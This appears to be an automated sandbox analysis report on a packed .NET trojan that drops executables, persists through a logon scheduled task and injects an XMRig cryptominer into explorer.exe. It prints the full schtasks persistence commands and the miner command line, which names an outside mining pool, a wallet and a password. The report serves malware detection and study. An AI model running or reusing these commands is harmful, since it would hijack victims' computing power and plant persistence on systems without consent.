Analysis
-
max time kernel
61s -
max time network
180s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
10-06-2021 10:51
Static task
static1
Behavioral task
behavioral1
Sample
SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe
Resource
win7v20210408
General
-
Target
SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe
-
Size
2.2MB
-
MD5
bd8eaab97c1724a00678af57bfa1c060
-
SHA1
075a96004a9a974ffd40254fbf36049cc9f0f940
-
SHA256
1ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea
-
SHA512
d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1588-90-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral1/memory/1588-91-0x00000001402EB66C-mapping.dmp xmrig behavioral1/memory/1588-93-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 3 IoCs
Processes:
sihost64.exeServices.exesihost64.exepid process 1580 sihost64.exe 1564 Services.exe 920 sihost64.exe -
Loads dropped DLL 1 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exepid process 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Services.exedescription pid process target process PID 1564 set thread context of 1588 1564 Services.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exeServices.exepid process 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe 1564 Services.exe 1564 Services.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exesihost64.exeServices.exesihost64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe Token: SeDebugPrivilege 1580 sihost64.exe Token: SeDebugPrivilege 1564 Services.exe Token: SeDebugPrivilege 920 sihost64.exe Token: SeLockMemoryPrivilege 1588 explorer.exe Token: SeLockMemoryPrivilege 1588 explorer.exe -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.execmd.exeServices.execmd.exedescription pid process target process PID 748 wrote to memory of 368 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe cmd.exe PID 748 wrote to memory of 368 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe cmd.exe PID 748 wrote to memory of 368 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe cmd.exe PID 368 wrote to memory of 988 368 cmd.exe schtasks.exe PID 368 wrote to memory of 988 368 cmd.exe schtasks.exe PID 368 wrote to memory of 988 368 cmd.exe schtasks.exe PID 748 wrote to memory of 1580 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe sihost64.exe PID 748 wrote to memory of 1580 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe sihost64.exe PID 748 wrote to memory of 1580 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe sihost64.exe PID 748 wrote to memory of 1580 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe sihost64.exe PID 748 wrote to memory of 1564 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe Services.exe PID 748 wrote to memory of 1564 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe Services.exe PID 748 wrote to memory of 1564 748 SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe Services.exe PID 1564 wrote to memory of 964 1564 Services.exe cmd.exe PID 1564 wrote to memory of 964 1564 Services.exe cmd.exe PID 1564 wrote to memory of 964 1564 Services.exe cmd.exe PID 964 wrote to memory of 836 964 cmd.exe schtasks.exe PID 964 wrote to memory of 836 964 cmd.exe schtasks.exe PID 964 wrote to memory of 836 964 cmd.exe schtasks.exe PID 1564 wrote to memory of 920 1564 Services.exe sihost64.exe PID 1564 wrote to memory of 920 1564 Services.exe sihost64.exe PID 1564 wrote to memory of 920 1564 Services.exe sihost64.exe PID 1564 wrote to memory of 920 1564 Services.exe sihost64.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe PID 1564 wrote to memory of 1588 1564 Services.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.721.2973.1958.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Services.exe"C:\Users\Admin\AppData\Local\Temp\Services.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:3333 --user=4AAkh5so8qhiNxHwRe7JdJcZTibJQKizdZ5ChQMMdRA3g1cz16NodDGTe2y6Xb4kBj4wHvV8v1pwsN1KxNB4wmVWBRhhHKN --pass=WAVEMINER9961 --cpu-max-threads-hint=10 --donate-level=5 --cinit-idle-wait=30 --cinit-idle-cpu=30 --cinit-stealth3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Services.exeMD5
bd8eaab97c1724a00678af57bfa1c060
SHA1075a96004a9a974ffd40254fbf36049cc9f0f940
SHA2561ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea
SHA512d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda
-
C:\Users\Admin\AppData\Local\Temp\Services.exeMD5
bd8eaab97c1724a00678af57bfa1c060
SHA1075a96004a9a974ffd40254fbf36049cc9f0f940
SHA2561ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea
SHA512d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sysMD5
0c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
fcdf214645952c4af042b2690645ee04
SHA16fc7c6e6185dcc28d2a8d87f5d1cfff937096db2
SHA25622a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe
SHA512daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
fcdf214645952c4af042b2690645ee04
SHA16fc7c6e6185dcc28d2a8d87f5d1cfff937096db2
SHA25622a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe
SHA512daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
fcdf214645952c4af042b2690645ee04
SHA16fc7c6e6185dcc28d2a8d87f5d1cfff937096db2
SHA25622a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe
SHA512daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
fcdf214645952c4af042b2690645ee04
SHA16fc7c6e6185dcc28d2a8d87f5d1cfff937096db2
SHA25622a83e5b94e5b130c870026676b2e03591f24c32b1cbcbfa4eada0f9d5e82ebe
SHA512daa1ca58a33756a9142336b9cb79abe529ddaf74ef4c46d33403c7bde7b7b5a7f213445c502f876d7c14d6845f6e1df39930eb410611f0d958a7036f88c79a79
-
\Users\Admin\AppData\Local\Temp\Services.exeMD5
bd8eaab97c1724a00678af57bfa1c060
SHA1075a96004a9a974ffd40254fbf36049cc9f0f940
SHA2561ed5337566938228ee9afcad29b1f722d55f4f8172a3157af4d4ad913541b2ea
SHA512d085a9c1a937c22e8bd2ed73e29cdc662723d88c83e6a0b8a7b90b67e61c92e8ae241c3237d51f1ad591e4f57cc0ec44de6d2c70f71e0af36e47dec79f514bda
-
memory/368-64-0x0000000000000000-mapping.dmp
-
memory/748-60-0x000000013F5B0000-0x000000013F5B1000-memory.dmpFilesize
4KB
-
memory/748-62-0x000000001C0F0000-0x000000001C31A000-memory.dmpFilesize
2.2MB
-
memory/748-63-0x000000001B980000-0x000000001B982000-memory.dmpFilesize
8KB
-
memory/836-81-0x0000000000000000-mapping.dmp
-
memory/920-88-0x0000000000FE0000-0x0000000000FE1000-memory.dmpFilesize
4KB
-
memory/920-86-0x0000000001040000-0x0000000001041000-memory.dmpFilesize
4KB
-
memory/920-82-0x0000000000000000-mapping.dmp
-
memory/964-80-0x0000000000000000-mapping.dmp
-
memory/988-65-0x0000000000000000-mapping.dmp
-
memory/1564-89-0x00000000022F0000-0x00000000022FA000-memory.dmpFilesize
40KB
-
memory/1564-79-0x000000001BDE0000-0x000000001BDE2000-memory.dmpFilesize
8KB
-
memory/1564-69-0x0000000000000000-mapping.dmp
-
memory/1564-73-0x000000013F200000-0x000000013F201000-memory.dmpFilesize
4KB
-
memory/1580-77-0x0000000004DA0000-0x0000000004DA1000-memory.dmpFilesize
4KB
-
memory/1580-66-0x0000000000000000-mapping.dmp
-
memory/1580-75-0x00000000012B0000-0x00000000012B1000-memory.dmpFilesize
4KB
-
memory/1588-90-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1588-91-0x00000001402EB66C-mapping.dmp
-
memory/1588-92-0x00000000000E0000-0x0000000000100000-memory.dmpFilesize
128KB
-
memory/1588-93-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1588-94-0x0000000000140000-0x0000000000160000-memory.dmpFilesize
128KB
-
memory/1588-95-0x0000000000140000-0x0000000000160000-memory.dmpFilesize
128KB